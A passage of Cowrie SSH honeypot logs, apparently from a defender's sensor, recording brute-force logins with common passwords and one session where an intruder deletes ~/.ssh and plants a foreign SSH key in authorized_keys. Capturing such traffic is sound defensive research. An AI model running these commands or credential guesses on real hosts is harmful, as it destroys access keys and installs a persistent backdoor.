{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:39:25.782448Z","src_ip":"212.227.235.229","session":"cbb8332b8486"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:26.077160Z","src_ip":"212.227.235.229","session":"8478c44cd80e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:26.083759Z","src_ip":"212.227.235.229","session":"cbb8332b8486"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47220,"dst_ip":"1.2.3.4","dst_port":22,"session":"143b10c6aaf2","protocol":"ssh","message":"New connection: 212.227.235.229:47220 (1.2.3.4:22) [session: 143b10c6aaf2]","sensor":"my-vps","timestamp":"2025-09-08T12:39:36.629158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:36.629972Z","src_ip":"212.227.235.229","session":"143b10c6aaf2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:36.891100Z","src_ip":"212.227.235.229","session":"143b10c6aaf2"}
{"eventid":"cowrie.login.failed","username":"cy","password":"cy123","message":"login attempt [cy/cy123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:39:38.023482Z","src_ip":"212.227.235.229","session":"143b10c6aaf2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:39.287572Z","src_ip":"212.227.235.229","session":"143b10c6aaf2"}
{"eventid":"cowrie.session.connect","src_ip":"113.113.80.36","src_port":45260,"dst_ip":"1.2.3.4","dst_port":22,"session":"657f456283c1","protocol":"ssh","message":"New connection: 113.113.80.36:45260 (1.2.3.4:22) [session: 657f456283c1]","sensor":"my-vps","timestamp":"2025-09-08T12:39:47.460413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:47.461150Z","src_ip":"113.113.80.36","session":"657f456283c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:47.690215Z","src_ip":"113.113.80.36","session":"657f456283c1"}
{"eventid":"cowrie.login.failed","username":"user3","password":"user3","message":"login attempt [user3/user3] failed","sensor":"my-vps","timestamp":"2025-09-08T12:39:48.638614Z","src_ip":"113.113.80.36","session":"657f456283c1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36850,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7a4bb162522","protocol":"ssh","message":"New connection: 212.227.235.229:36850 (1.2.3.4:22) [session: d7a4bb162522]","sensor":"my-vps","timestamp":"2025-09-08T12:39:48.889607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:39:48.890763Z","src_ip":"212.227.235.229","session":"d7a4bb162522"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:39:49.020931Z","src_ip":"212.227.235.229","session":"d7a4bb162522"}
{"eventid":"cowrie.login.failed","username":"init","password":"init.123","message":"login attempt [init/init.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:39:49.583995Z","src_ip":"212.227.235.229","session":"d7a4bb162522"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:49.868315Z","src_ip":"113.113.80.36","session":"657f456283c1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:39:50.716532Z","src_ip":"212.227.235.229","session":"d7a4bb162522"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36366,"dst_ip":"1.2.3.4","dst_port":22,"session":"97f0ad131bcc","protocol":"ssh","message":"New connection: 212.227.235.229:36366 (1.2.3.4:22) [session: 97f0ad131bcc]","sensor":"my-vps","timestamp":"2025-09-08T12:40:09.494848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:09.495806Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:09.794289Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:40:11.026554Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:40:11.637875Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:40:11.638566Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:40:11.639902Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:11.938598Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:40:12.626434Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:40:12.627126Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:40:12.929601Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:12.930429Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37662,"dst_ip":"1.2.3.4","dst_port":22,"session":"4421ee2d8c2f","protocol":"ssh","message":"New connection: 212.227.235.229:37662 (1.2.3.4:22) [session: 4421ee2d8c2f]","sensor":"my-vps","timestamp":"2025-09-08T12:40:13.205849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:13.207822Z","src_ip":"212.227.235.229","session":"4421ee2d8c2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:13.501908Z","src_ip":"212.227.235.229","session":"4421ee2d8c2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:40:14.652567Z","src_ip":"212.227.235.229","session":"4421ee2d8c2f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:15.944602Z","src_ip":"212.227.235.229","session":"4421ee2d8c2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39056,"dst_ip":"1.2.3.4","dst_port":22,"session":"92d40ead9c9b","protocol":"ssh","message":"New connection: 212.227.235.229:39056 (1.2.3.4:22) [session: 92d40ead9c9b]","sensor":"my-vps","timestamp":"2025-09-08T12:40:16.248394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:16.249106Z","src_ip":"212.227.235.229","session":"92d40ead9c9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:16.544602Z","src_ip":"212.227.235.229","session":"92d40ead9c9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37530,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd942fa3d3a6","protocol":"ssh","message":"New connection: 212.227.235.229:37530 (1.2.3.4:22) [session: dd942fa3d3a6]","sensor":"my-vps","timestamp":"2025-09-08T12:40:17.448686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:17.450316Z","src_ip":"212.227.235.229","session":"dd942fa3d3a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:17.618719Z","src_ip":"212.227.235.229","session":"dd942fa3d3a6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:40:17.771934Z","src_ip":"212.227.235.229","session":"92d40ead9c9b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:18.069010Z","src_ip":"212.227.235.229","session":"92d40ead9c9b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:18.069952Z","src_ip":"212.227.235.229","session":"97f0ad131bcc"}
{"eventid":"cowrie.login.failed","username":"client","password":"password123","message":"login attempt [client/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:40:18.316825Z","src_ip":"212.227.235.229","session":"dd942fa3d3a6"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:19.489904Z","src_ip":"212.227.235.229","session":"dd942fa3d3a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39680,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d1ce7480379","protocol":"ssh","message":"New connection: 212.227.235.229:39680 (1.2.3.4:22) [session: 8d1ce7480379]","sensor":"my-vps","timestamp":"2025-09-08T12:40:30.099769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:30.100688Z","src_ip":"212.227.235.229","session":"8d1ce7480379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:40:30.400096Z","src_ip":"212.227.235.229","session":"8d1ce7480379"}
{"eventid":"cowrie.login.failed","username":"ahmad","password":"password123","message":"login attempt [ahmad/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:40:31.700961Z","src_ip":"212.227.235.229","session":"8d1ce7480379"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:40:33.000938Z","src_ip":"212.227.235.229","session":"8d1ce7480379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34622,"dst_ip":"1.2.3.4","dst_port":22,"session":"39d027c40fbb","protocol":"ssh","message":"New connection: 212.227.235.229:34622 (1.2.3.4:22) [session: 39d027c40fbb]","sensor":"my-vps","timestamp":"2025-09-08T12:40:53.183938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:40:53.184945Z","src_ip":"212.227.235.229","session":"39d027c40fbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-